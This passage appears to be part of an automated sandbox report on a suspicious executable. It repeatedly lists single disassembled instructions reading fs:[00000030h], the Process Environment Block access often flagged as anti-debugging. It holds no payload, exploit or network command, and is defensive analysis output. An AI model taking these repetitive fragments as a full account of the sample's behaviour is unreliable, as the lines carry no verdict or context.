    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h] 4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h] 4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h] 4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h] 4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h] 4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h] 4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35957505 mov eax, dword ptr fs:[00000030h] 4_2_35957505
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35957505 mov ecx, dword ptr fs:[00000030h] 4_2_35957505
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595D530 mov eax, dword ptr fs:[00000030h] 4_2_3595D530
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595D530 mov eax, dword ptr fs:[00000030h] 4_2_3595D530
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h] 4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h] 4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h] 4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h] 4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h] 4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h] 4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F5537 mov eax, dword ptr fs:[00000030h] 4_2_359F5537
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DB52F mov eax, dword ptr fs:[00000030h] 4_2_359DB52F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h] 4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h] 4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h] 4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h] 4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h] 4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h] 4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h] 4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB550 mov eax, dword ptr fs:[00000030h] 4_2_359CB550
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB550 mov eax, dword ptr fs:[00000030h] 4_2_359CB550
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB550 mov eax, dword ptr fs:[00000030h] 4_2_359CB550
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595B570 mov eax, dword ptr fs:[00000030h] 4_2_3595B570
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595B570 mov eax, dword ptr fs:[00000030h] 4_2_3595B570
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B562 mov eax, dword ptr fs:[00000030h] 4_2_3591B562
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B480 mov eax, dword ptr fs:[00000030h] 4_2_3591B480
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35929486 mov eax, dword ptr fs:[00000030h] 4_2_35929486
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35929486 mov eax, dword ptr fs:[00000030h] 4_2_35929486
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359174B0 mov eax, dword ptr fs:[00000030h] 4_2_359174B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359174B0 mov eax, dword ptr fs:[00000030h] 4_2_359174B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359534B0 mov eax, dword ptr fs:[00000030h] 4_2_359534B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C74B0 mov eax, dword ptr fs:[00000030h] 4_2_359C74B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F54DB mov eax, dword ptr fs:[00000030h] 4_2_359F54DB
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C94E0 mov eax, dword ptr fs:[00000030h] 4_2_359C94E0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359A7410 mov eax, dword ptr fs:[00000030h] 4_2_359A7410
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594340D mov eax, dword ptr fs:[00000030h] 4_2_3594340D
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h] 4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h] 4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h] 4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h] 4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DF453 mov eax, dword ptr fs:[00000030h] 4_2_359DF453
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h] 4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h] 4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h] 4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h] 4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h] 4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h] 4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F547F mov eax, dword ptr fs:[00000030h] 4_2_359F547F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35921460 mov eax, dword ptr fs:[00000030h] 4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35921460 mov eax, dword ptr fs:[00000030h] 4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35921460 mov eax, dword ptr fs:[00000030h] 4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35921460 mov eax, dword ptr fs:[00000030h] 4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35921460 mov eax, dword ptr fs:[00000030h] 4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h] 4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h] 4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h] 4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h] 4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h] 4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h] 4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DF78A mov eax, dword ptr fs:[00000030h] 4_2_359DF78A
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594D7B0 mov eax, dword ptr fs:[00000030h] 4_2_3594D7B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F37B6 mov eax, dword ptr fs:[00000030h] 4_2_359F37B6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h] 4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DD7B0 mov eax, dword ptr fs:[00000030h] 4_2_359DD7B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DD7B0 mov eax, dword ptr fs:[00000030h] 4_2_359DD7B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359A97A9 mov eax, dword ptr fs:[00000030h] 4_2_359A97A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h] 4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h] 4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h] 4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h] 4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h] 4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359257C0 mov eax, dword ptr fs:[00000030h] 4_2_359257C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359257C0 mov eax, dword ptr fs:[00000030h] 4_2_359257C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359257C0 mov eax, dword ptr fs:[00000030h] 4_2_359257C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592D7E0 mov ecx, dword ptr fs:[00000030h] 4_2_3592D7E0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595F71F mov eax, dword ptr fs:[00000030h] 4_2_3595F71F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595F71F mov eax, dword ptr fs:[00000030h] 4_2_3595F71F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35925702 mov eax, dword ptr fs:[00000030h] 4_2_35925702
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35925702 mov eax, dword ptr fs:[00000030h] 4_2_35925702
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35927703 mov eax, dword ptr fs:[00000030h] 4_2_35927703
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35919730 mov eax, dword ptr fs:[00000030h] 4_2_35919730
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35919730 mov eax, dword ptr fs:[00000030h] 4_2_35919730
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35955734 mov eax, dword ptr fs:[00000030h] 4_2_35955734
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h] 4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h] 4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h] 4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h] 4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592973A mov eax, dword ptr fs:[00000030h] 4_2_3592973A
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592973A mov eax, dword ptr fs:[00000030h] 4_2_3592973A
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35923720 mov eax, dword ptr fs:[00000030h] 4_2_35923720
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F720 mov eax, dword ptr fs:[00000030h] 4_2_3593F720
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F720 mov eax, dword ptr fs:[00000030h] 4_2_3593F720
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593F720 mov eax, dword ptr fs:[00000030h] 4_2_3593F720
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DF72E mov eax, dword ptr fs:[00000030h] 4_2_359DF72E
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E972B mov eax, dword ptr fs:[00000030h] 4_2_359E972B
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C375F mov eax, dword ptr fs:[00000030h] 4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C375F mov eax, dword ptr fs:[00000030h] 4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C375F mov eax, dword ptr fs:[00000030h] 4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C375F mov eax, dword ptr fs:[00000030h] 4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C375F mov eax, dword ptr fs:[00000030h] 4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35933740 mov eax, dword ptr fs:[00000030h] 4_2_35933740
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35933740 mov eax, dword ptr fs:[00000030h] 4_2_35933740
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35933740 mov eax, dword ptr fs:[00000030h] 4_2_35933740
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F3749 mov eax, dword ptr fs:[00000030h] 4_2_359F3749
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h] 4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h] 4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h] 4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h] 4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359A368C mov eax, dword ptr fs:[00000030h] 4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359A368C mov eax, dword ptr fs:[00000030h] 4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359A368C mov eax, dword ptr fs:[00000030h] 4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359A368C mov eax, dword ptr fs:[00000030h] 4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359176B2 mov eax, dword ptr fs:[00000030h] 4_2_359176B2
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359176B2 mov eax, dword ptr fs:[00000030h] 4_2_359176B2
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359176B2 mov eax, dword ptr fs:[00000030h] 4_2_359176B2
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591D6AA mov eax, dword ptr fs:[00000030h] 4_2_3591D6AA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591D6AA mov eax, dword ptr fs:[00000030h] 4_2_3591D6AA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h] 4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h] 4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h] 4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h] 4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h] 4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DF6C7 mov eax, dword ptr fs:[00000030h] 4_2_359DF6C7
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359516CF mov eax, dword ptr fs:[00000030h] 4_2_359516CF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DD6F0 mov eax, dword ptr fs:[00000030h] 4_2_359DD6F0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594D6E0 mov eax, dword ptr fs:[00000030h] 4_2_3594D6E0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594D6E0 mov eax, dword ptr fs:[00000030h] 4_2_3594D6E0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h] 4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h] 4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h] 4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h] 4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h] 4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h] 4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35923616 mov eax, dword ptr fs:[00000030h] 4_2_35923616
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35923616 mov eax, dword ptr fs:[00000030h] 4_2_35923616
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35951607 mov eax, dword ptr fs:[00000030h] 4_2_35951607
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595F603 mov eax, dword ptr fs:[00000030h] 4_2_3595F603
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F5636 mov eax, dword ptr fs:[00000030h] 4_2_359F5636
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h] 4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35959660 mov eax, dword ptr fs:[00000030h] 4_2_35959660
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35959660 mov eax, dword ptr fs:[00000030h] 4_2_35959660
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359BD660 mov eax, dword ptr fs:[00000030h] 4_2_359BD660
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35977190 mov eax, dword ptr fs:[00000030h] 4_2_35977190
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D5180 mov eax, dword ptr fs:[00000030h] 4_2_359D5180
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D5180 mov eax, dword ptr fs:[00000030h] 4_2_359D5180
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3593B1B0 mov eax, dword ptr fs:[00000030h] 4_2_3593B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h] 4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h] 4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h] 4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h] 4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595D1D0 mov eax, dword ptr fs:[00000030h] 4_2_3595D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595D1D0 mov ecx, dword ptr fs:[00000030h] 4_2_3595D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F51CB mov eax, dword ptr fs:[00000030h] 4_2_359F51CB
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359C71F9 mov esi, dword ptr fs:[00000030h] 4_2_359C71F9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359451EF mov eax, dword ptr fs:[00000030h] 4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F31E1 mov eax, dword ptr fs:[00000030h] 4_2_359F31E1
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359251ED mov eax, dword ptr fs:[00000030h] 4_2_359251ED
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35921131 mov eax, dword ptr fs:[00000030h] 4_2_35921131
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35921131 mov eax, dword ptr fs:[00000030h] 4_2_35921131
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h] 4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h] 4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h] 4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591B136 mov eax, dword ptr fs:[00000030h] 4_2_3591B136
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F7120 mov eax, dword ptr fs:[00000030h] 4_2_359F7120
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35927152 mov eax, dword ptr fs:[00000030h] 4_2_35927152
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F5152 mov eax, dword ptr fs:[00000030h] 4_2_359F5152
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35919148 mov eax, dword ptr fs:[00000030h] 4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35919148 mov eax, dword ptr fs:[00000030h] 4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35919148 mov eax, dword ptr fs:[00000030h] 4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35919148 mov eax, dword ptr fs:[00000030h] 4_2_35919148
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B3140 mov eax, dword ptr fs:[00000030h] 4_2_359B3140
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B3140 mov eax, dword ptr fs:[00000030h] 4_2_359B3140
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B3140 mov eax, dword ptr fs:[00000030h] 4_2_359B3140
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B9179 mov eax, dword ptr fs:[00000030h] 4_2_359B9179
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
